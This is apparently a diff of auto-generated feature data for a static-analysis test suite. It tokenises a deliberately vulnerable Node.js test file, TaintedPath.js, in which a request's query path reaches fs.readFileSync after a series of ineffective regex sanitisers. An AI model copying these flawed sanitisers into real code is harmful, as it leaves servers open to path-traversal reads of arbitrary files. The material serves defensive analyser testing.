| contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:178:13:178:14 | fs | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g res write fs readFileSync path replace /[abcd]/g res write fs readFileSync path replace /[./]/g res write fs readFileSync path replace /[foobar/foobar]/g res write fs readFileSync path replace /\\//g res write fs readFileSync path replace /\\.\|\\//g res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g pathModule isAbsolute path res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g res write fs readFileSync prefix pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)*/ res write fs readFileSync prefix path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ | +| autogenerated/TaintedPath/TaintedPath.js:178:13:178:14 | fs | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:178:13:178:14 | fs | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:178:13:178:27 | fs.readFileSync | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:178:13:178:27 | fs.readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:178:13:178:27 | fs.readFileSync | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g res write fs readFileSync path replace /[abcd]/g res write fs readFileSync path replace /[./]/g res write fs readFileSync path replace /[foobar/foobar]/g res write fs readFileSync path replace /\\//g res write fs readFileSync path replace /\\.\|\\//g res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g pathModule isAbsolute path res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g res write fs readFileSync prefix pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)*/ res write fs readFileSync prefix path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ | +| autogenerated/TaintedPath/TaintedPath.js:178:13:178:27 | fs.readFileSync | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:178:13:178:27 | fs.readFileSync | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:178:13:178:52 | exceptional return of fs.read ... g, '')) | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:178:13:178:52 | exceptional return of fs.read ... g, '')) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:178:13:178:52 | exceptional return of fs.read ... g, '')) | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g res write fs readFileSync path replace /[abcd]/g res write fs readFileSync path replace /[./]/g res write fs readFileSync path replace /[foobar/foobar]/g res write fs readFileSync path replace /\\//g res write fs readFileSync path replace /\\.\|\\//g res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g pathModule isAbsolute path res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g res write fs readFileSync prefix pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)*/ res write fs readFileSync prefix path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ | +| autogenerated/TaintedPath/TaintedPath.js:178:13:178:52 | exceptional return of fs.read ... g, '')) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:178:13:178:52 | exceptional return of fs.read ... g, '')) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:178:13:178:52 | fs.read ... g, '')) | CalleeFlexibleAccessPath | res.write | | autogenerated/TaintedPath/TaintedPath.js:178:13:178:52 | fs.read ... g, '')) | InputArgumentIndex | 0 | | autogenerated/TaintedPath/TaintedPath.js:178:13:178:52 | fs.read ... g, '')) | contextFunctionInterfaces | views_local(req, res) | @@ -6267,6 +64590,26 @@ tokenFeatures | autogenerated/TaintedPath/TaintedPath.js:178:13:178:52 | fs.read ... g, '')) | enclosingFunctionName | http.createServer#functionalargument | | autogenerated/TaintedPath/TaintedPath.js:178:13:178:52 | fs.read ... g, '')) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:178:13:178:52 | fs.read ... g, '')) | receiverName | res | +| autogenerated/TaintedPath/TaintedPath.js:178:16:178:27 | readFileSync | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:178:16:178:27 | readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:178:16:178:27 | readFileSync | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g res write fs readFileSync path replace /[abcd]/g res write fs readFileSync path replace /[./]/g res write fs readFileSync path replace /[foobar/foobar]/g res write fs readFileSync path replace /\\//g res write fs readFileSync path replace /\\.\|\\//g res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g pathModule isAbsolute path res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g res write fs readFileSync prefix pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)*/ res write fs readFileSync prefix path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ | +| autogenerated/TaintedPath/TaintedPath.js:178:16:178:27 | readFileSync | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:178:16:178:27 | readFileSync | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:178:29:178:32 | path | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:178:29:178:32 | path | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:178:29:178:32 | path | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g res write fs readFileSync path replace /[abcd]/g res write fs readFileSync path replace /[./]/g res write fs readFileSync path replace /[foobar/foobar]/g res write fs readFileSync path replace /\\//g res write fs readFileSync path replace /\\.\|\\//g res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g pathModule isAbsolute path res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g res write fs readFileSync prefix pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)*/ res write fs readFileSync prefix path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ | +| autogenerated/TaintedPath/TaintedPath.js:178:29:178:32 | path | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:178:29:178:32 | path | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:178:29:178:40 | path.replace | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:178:29:178:40 | path.replace | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:178:29:178:40 | path.replace | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g res write fs readFileSync path replace /[abcd]/g res write fs readFileSync path replace /[./]/g res write fs readFileSync path replace /[foobar/foobar]/g res write fs readFileSync path replace /\\//g res write fs readFileSync path replace /\\.\|\\//g res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g pathModule isAbsolute path res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g res write fs readFileSync prefix pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)*/ res write fs readFileSync prefix path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ | +| autogenerated/TaintedPath/TaintedPath.js:178:29:178:40 | path.replace | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:178:29:178:40 | path.replace | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:178:29:178:51 | exceptional return of path.re ... /g, '') | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:178:29:178:51 | exceptional return of path.re ... /g, '') | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:178:29:178:51 | exceptional return of path.re ... /g, '') | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g res write fs readFileSync path replace /[abcd]/g res write fs readFileSync path replace /[./]/g res write fs readFileSync path replace /[foobar/foobar]/g res write fs readFileSync path replace /\\//g res write fs readFileSync path replace /\\.\|\\//g res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g pathModule isAbsolute path res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g res write fs readFileSync prefix pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)*/ res write fs readFileSync prefix path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ | +| autogenerated/TaintedPath/TaintedPath.js:178:29:178:51 | exceptional return of path.re ... /g, '') | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:178:29:178:51 | exceptional return of path.re ... /g, '') | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:178:29:178:51 | path.re ... /g, '') | CalleeFlexibleAccessPath | fs.readFileSync | | autogenerated/TaintedPath/TaintedPath.js:178:29:178:51 | path.re ... /g, '') | InputArgumentIndex | 0 | | autogenerated/TaintedPath/TaintedPath.js:178:29:178:51 | path.re ... /g, '') | calleeImports | fs | @@ -6276,6 +64619,11 @@ tokenFeatures | autogenerated/TaintedPath/TaintedPath.js:178:29:178:51 | path.re ... /g, '') | enclosingFunctionName | http.createServer#functionalargument | | autogenerated/TaintedPath/TaintedPath.js:178:29:178:51 | path.re ... /g, '') | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:178:29:178:51 | path.re ... /g, '') | receiverName | fs | +| autogenerated/TaintedPath/TaintedPath.js:178:34:178:40 | replace | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:178:34:178:40 | replace | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:178:34:178:40 | replace | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g res write fs readFileSync path replace /[abcd]/g res write fs readFileSync path replace /[./]/g res write fs readFileSync path replace /[foobar/foobar]/g res write fs readFileSync path replace /\\//g res write fs readFileSync path replace /\\.\|\\//g res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g pathModule isAbsolute path res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g res write fs readFileSync prefix pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)*/ res write fs readFileSync prefix path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ | +| autogenerated/TaintedPath/TaintedPath.js:178:34:178:40 | replace | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:178:34:178:40 | replace | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:178:42:178:46 | /\\./g | CalleeFlexibleAccessPath | path.replace | | autogenerated/TaintedPath/TaintedPath.js:178:42:178:46 | /\\./g | InputArgumentIndex | 0 | | autogenerated/TaintedPath/TaintedPath.js:178:42:178:46 | /\\./g | calleeImports | url | @@ -6294,6 +64642,46 @@ tokenFeatures | autogenerated/TaintedPath/TaintedPath.js:178:49:178:50 | '' | enclosingFunctionName | http.createServer#functionalargument | | autogenerated/TaintedPath/TaintedPath.js:178:49:178:50 | '' | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:178:49:178:50 | '' | receiverName | path | +| autogenerated/TaintedPath/TaintedPath.js:179:3:179:5 | res | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:179:3:179:5 | res | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:179:3:179:5 | res | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g res write fs readFileSync path replace /[abcd]/g res write fs readFileSync path replace /[./]/g res write fs readFileSync path replace /[foobar/foobar]/g res write fs readFileSync path replace /\\//g res write fs readFileSync path replace /\\.\|\\//g res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g pathModule isAbsolute path res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g res write fs readFileSync prefix pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)*/ res write fs readFileSync prefix path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ | +| autogenerated/TaintedPath/TaintedPath.js:179:3:179:5 | res | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:179:3:179:5 | res | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:179:3:179:11 | res.write | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:179:3:179:11 | res.write | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:179:3:179:11 | res.write | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g res write fs readFileSync path replace /[abcd]/g res write fs readFileSync path replace /[./]/g res write fs readFileSync path replace /[foobar/foobar]/g res write fs readFileSync path replace /\\//g res write fs readFileSync path replace /\\.\|\\//g res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g pathModule isAbsolute path res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g res write fs readFileSync prefix pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)*/ res write fs readFileSync prefix path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ | +| autogenerated/TaintedPath/TaintedPath.js:179:3:179:11 | res.write | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:179:3:179:11 | res.write | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:179:3:179:59 | exceptional return of res.wri ... , ''))) | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:179:3:179:59 | exceptional return of res.wri ... , ''))) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:179:3:179:59 | exceptional return of res.wri ... , ''))) | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g res write fs readFileSync path replace /[abcd]/g res write fs readFileSync path replace /[./]/g res write fs readFileSync path replace /[foobar/foobar]/g res write fs readFileSync path replace /\\//g res write fs readFileSync path replace /\\.\|\\//g res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g pathModule isAbsolute path res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g res write fs readFileSync prefix pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)*/ res write fs readFileSync prefix path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ | +| autogenerated/TaintedPath/TaintedPath.js:179:3:179:59 | exceptional return of res.wri ... , ''))) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:179:3:179:59 | exceptional return of res.wri ... , ''))) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:179:3:179:59 | res.wri ... , ''))) | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:179:3:179:59 | res.wri ... , ''))) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:179:3:179:59 | res.wri ... , ''))) | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g res write fs readFileSync path replace /[abcd]/g res write fs readFileSync path replace /[./]/g res write fs readFileSync path replace /[foobar/foobar]/g res write fs readFileSync path replace /\\//g res write fs readFileSync path replace /\\.\|\\//g res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g pathModule isAbsolute path res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g res write fs readFileSync prefix pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)*/ res write fs readFileSync prefix path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ | +| autogenerated/TaintedPath/TaintedPath.js:179:3:179:59 | res.wri ... , ''))) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:179:3:179:59 | res.wri ... , ''))) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:179:7:179:11 | write | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:179:7:179:11 | write | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:179:7:179:11 | write | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g res write fs readFileSync path replace /[abcd]/g res write fs readFileSync path replace /[./]/g res write fs readFileSync path replace /[foobar/foobar]/g res write fs readFileSync path replace /\\//g res write fs readFileSync path replace /\\.\|\\//g res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g pathModule isAbsolute path res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g res write fs readFileSync prefix pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)*/ res write fs readFileSync prefix path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ | +| autogenerated/TaintedPath/TaintedPath.js:179:7:179:11 | write | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:179:7:179:11 | write | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:179:13:179:14 | fs | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:179:13:179:14 | fs | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:179:13:179:14 | fs | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g res write fs readFileSync path replace /[abcd]/g res write fs readFileSync path replace /[./]/g res write fs readFileSync path replace /[foobar/foobar]/g res write fs readFileSync path replace /\\//g res write fs readFileSync path replace /\\.\|\\//g res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g pathModule isAbsolute path res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g res write fs readFileSync prefix pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)*/ res write fs readFileSync prefix path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ | +| autogenerated/TaintedPath/TaintedPath.js:179:13:179:14 | fs | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:179:13:179:14 | fs | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:179:13:179:27 | fs.readFileSync | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:179:13:179:27 | fs.readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:179:13:179:27 | fs.readFileSync | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g res write fs readFileSync path replace /[abcd]/g res write fs readFileSync path replace /[./]/g res write fs readFileSync path replace /[foobar/foobar]/g res write fs readFileSync path replace /\\//g res write fs readFileSync path replace /\\.\|\\//g res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g pathModule isAbsolute path res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g res write fs readFileSync prefix pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)*/ res write fs readFileSync prefix path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ | +| autogenerated/TaintedPath/TaintedPath.js:179:13:179:27 | fs.readFileSync | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:179:13:179:27 | fs.readFileSync | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:179:13:179:58 | exceptional return of fs.read ... g, '')) | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:179:13:179:58 | exceptional return of fs.read ... g, '')) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:179:13:179:58 | exceptional return of fs.read ... g, '')) | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g res write fs readFileSync path replace /[abcd]/g res write fs readFileSync path replace /[./]/g res write fs readFileSync path replace /[foobar/foobar]/g res write fs readFileSync path replace /\\//g res write fs readFileSync path replace /\\.\|\\//g res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g pathModule isAbsolute path res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g res write fs readFileSync prefix pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)*/ res write fs readFileSync prefix path replace 